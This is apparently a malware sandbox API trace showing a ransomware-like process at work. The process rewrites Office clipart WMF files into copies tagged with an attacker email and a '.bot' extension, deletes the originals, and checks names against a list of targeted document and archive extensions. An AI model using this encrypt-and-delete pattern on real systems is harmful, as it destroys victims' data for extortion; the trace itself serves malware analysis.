	[0141.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0141.058] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.058] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0141.059] GetLastError () returned 0x0
	[0141.059] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x25ee, lpOverlapped=0x0) returned 1
	[0141.069] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x25f0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x25f0, lpOverlapped=0x0) returned 1
	[0141.070] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.070] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.070] SetEndOfFile (hFile=0x384) returned 1
	[0141.070] CloseHandle (hObject=0x384) returned 1
	[0141.070] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.070] SetEndOfFile (hFile=0x3a4) returned 1
	[0141.073] CloseHandle (hObject=0x3a4) returned 1
	[0141.073] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.074] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf")) returned 1
	[0141.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63
	[0141.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63
	[0141.075] lstrlenW (lpString=".doc") returned 4
	[0141.075] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.075] lstrlenW (lpString=".docx") returned 5
	[0141.075] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.075] lstrlenW (lpString=".pdf") returned 4
	[0141.075] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.075] lstrlenW (lpString=".xls") returned 4
	[0141.075] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.075] lstrlenW (lpString=".xlsx") returned 5
	[0141.075] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.075] lstrlenW (lpString=".ppt") returned 4
	[0141.075] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63
	[0141.075] lstrlenW (lpString=".zip") returned 4
	[0141.075] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.075] lstrlenW (lpString=".rar") returned 4
	[0141.075] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.075] lstrlenW (lpString=".bz2") returned 4
	[0141.075] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.076] lstrlenW (lpString=".7z") returned 3
	[0141.076] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63
	[0141.076] lstrlenW (lpString=".dbf") returned 4
	[0141.076] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63
	[0141.076] lstrlenW (lpString=".1cd") returned 4
	[0141.076] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63
	[0141.076] lstrlenW (lpString=".jpg") returned 4
	[0141.076] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63
	[0141.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63
	[0141.076] lstrlenW (lpString=".doc") returned 4
	[0141.076] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.076] lstrlenW (lpString=".docx") returned 5
	[0141.076] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.076] lstrlenW (lpString=".pdf") returned 4
	[0141.076] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.076] lstrlenW (lpString=".xls") returned 4
	[0141.076] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.076] lstrlenW (lpString=".xlsx") returned 5
	[0141.076] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.076] lstrlenW (lpString=".ppt") returned 4
	[0141.076] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63
	[0141.076] lstrlenW (lpString=".zip") returned 4
	[0141.076] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.076] lstrlenW (lpString=".rar") returned 4
	[0141.076] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.076] lstrlenW (lpString=".bz2") returned 4
	[0141.076] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.076] lstrlenW (lpString=".7z") returned 3
	[0141.076] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63
	[0141.077] lstrlenW (lpString=".dbf") returned 4
	[0141.077] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63
	[0141.077] lstrlenW (lpString=".1cd") returned 4
	[0141.077] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63
	[0141.077] lstrlenW (lpString=".jpg") returned 4
	[0141.077] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.077] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.077] lstrlenW (lpString="BD19986_.WMF") returned 12
	[0141.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0141.078] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=14486) returned 1
	[0141.078] CloseHandle (hObject=0x3a4) returned 1
	[0141.078] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf")) returned 0x20
	[0141.078] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0141.078] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.078] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0141.079] GetLastError () returned 0x0
	[0141.079] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x3896, lpOverlapped=0x0) returned 1
	[0141.081] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x38a0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x38a0, lpOverlapped=0x0) returned 1
	[0141.082] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.082] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.082] SetEndOfFile (hFile=0x384) returned 1
	[0141.082] CloseHandle (hObject=0x384) returned 1
	[0141.082] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.082] SetEndOfFile (hFile=0x3a4) returned 1
	[0141.084] CloseHandle (hObject=0x3a4) returned 1
	[0141.084] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.085] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf")) returned 1
	[0141.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63
	[0141.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63
	[0141.085] lstrlenW (lpString=".doc") returned 4
	[0141.085] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.085] lstrlenW (lpString=".docx") returned 5
	[0141.085] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.085] lstrlenW (lpString=".pdf") returned 4
	[0141.085] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.085] lstrlenW (lpString=".xls") returned 4
	[0141.085] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.085] lstrlenW (lpString=".xlsx") returned 5
	[0141.085] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.085] lstrlenW (lpString=".ppt") returned 4
	[0141.085] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63
	[0141.086] lstrlenW (lpString=".zip") returned 4
	[0141.086] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.086] lstrlenW (lpString=".rar") returned 4
	[0141.086] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.086] lstrlenW (lpString=".bz2") returned 4
	[0141.086] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.086] lstrlenW (lpString=".7z") returned 3
	[0141.086] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63
	[0141.086] lstrlenW (lpString=".dbf") returned 4
	[0141.086] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63
	[0141.086] lstrlenW (lpString=".1cd") returned 4
	[0141.086] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63
	[0141.086] lstrlenW (lpString=".jpg") returned 4
	[0141.086] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63
	[0141.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63
	[0141.086] lstrlenW (lpString=".doc") returned 4
	[0141.086] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.086] lstrlenW (lpString=".docx") returned 5
	[0141.086] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.086] lstrlenW (lpString=".pdf") returned 4
	[0141.086] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.086] lstrlenW (lpString=".xls") returned 4
	[0141.086] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.086] lstrlenW (lpString=".xlsx") returned 5
	[0141.086] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.086] lstrlenW (lpString=".ppt") returned 4
	[0141.086] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63
	[0141.086] lstrlenW (lpString=".zip") returned 4
	[0141.086] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.087] lstrlenW (lpString=".rar") returned 4
	[0141.087] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.087] lstrlenW (lpString=".bz2") returned 4
	[0141.087] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.087] lstrlenW (lpString=".7z") returned 3
	[0141.087] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63
	[0141.087] lstrlenW (lpString=".dbf") returned 4
	[0141.087] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63
	[0141.087] lstrlenW (lpString=".1cd") returned 4
	[0141.087] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63
	[0141.087] lstrlenW (lpString=".jpg") returned 4
	[0141.087] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.087] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.087] lstrlenW (lpString="BD19988_.WMF") returned 12
	[0141.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0141.088] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=18304) returned 1
	[0141.088] CloseHandle (hObject=0x3a4) returned 1
	[0141.088] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf")) returned 0x20
	[0141.088] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0141.088] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.088] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0141.089] GetLastError () returned 0x0
	[0141.089] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x4780, lpOverlapped=0x0) returned 1
	[0141.090] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x4790, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x4790, lpOverlapped=0x0) returned 1
	[0141.091] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.091] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.092] SetEndOfFile (hFile=0x384) returned 1
	[0141.092] CloseHandle (hObject=0x384) returned 1
	[0141.092] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.092] SetEndOfFile (hFile=0x3a4) returned 1
	[0141.094] CloseHandle (hObject=0x3a4) returned 1
	[0141.094] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.095] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf")) returned 1
	[0141.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63
	[0141.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63
	[0141.095] lstrlenW (lpString=".doc") returned 4
	[0141.095] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.095] lstrlenW (lpString=".docx") returned 5
	[0141.095] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.095] lstrlenW (lpString=".pdf") returned 4
	[0141.095] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.095] lstrlenW (lpString=".xls") returned 4
	[0141.095] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.095] lstrlenW (lpString=".xlsx") returned 5
	[0141.095] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.095] lstrlenW (lpString=".ppt") returned 4
	[0141.095] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63
	[0141.095] lstrlenW (lpString=".zip") returned 4
	[0141.095] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.095] lstrlenW (lpString=".rar") returned 4
	[0141.095] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.096] lstrlenW (lpString=".bz2") returned 4
	[0141.096] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.096] lstrlenW (lpString=".7z") returned 3
	[0141.096] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63
	[0141.096] lstrlenW (lpString=".dbf") returned 4
	[0141.096] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63
	[0141.096] lstrlenW (lpString=".1cd") returned 4
	[0141.096] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63
	[0141.096] lstrlenW (lpString=".jpg") returned 4
	[0141.096] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63
	[0141.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63
	[0141.096] lstrlenW (lpString=".doc") returned 4
	[0141.096] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.096] lstrlenW (lpString=".docx") returned 5
	[0141.096] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.096] lstrlenW (lpString=".pdf") returned 4
	[0141.096] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.096] lstrlenW (lpString=".xls") returned 4
	[0141.096] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.096] lstrlenW (lpString=".xlsx") returned 5
	[0141.096] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.096] lstrlenW (lpString=".ppt") returned 4
	[0141.096] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63
	[0141.096] lstrlenW (lpString=".zip") returned 4
	[0141.096] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.096] lstrlenW (lpString=".rar") returned 4
	[0141.096] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.096] lstrlenW (lpString=".bz2") returned 4
	[0141.096] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.097] lstrlenW (lpString=".7z") returned 3
	[0141.097] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63
	[0141.097] lstrlenW (lpString=".dbf") returned 4
	[0141.097] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63
	[0141.097] lstrlenW (lpString=".1cd") returned 4
	[0141.097] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63
	[0141.097] lstrlenW (lpString=".jpg") returned 4
	[0141.097] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.097] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.097] lstrlenW (lpString="BD20013_.WMF") returned 12
	[0141.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0141.097] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=11058) returned 1
	[0141.097] CloseHandle (hObject=0x3a4) returned 1
	[0141.098] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf")) returned 0x20
	[0141.098] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
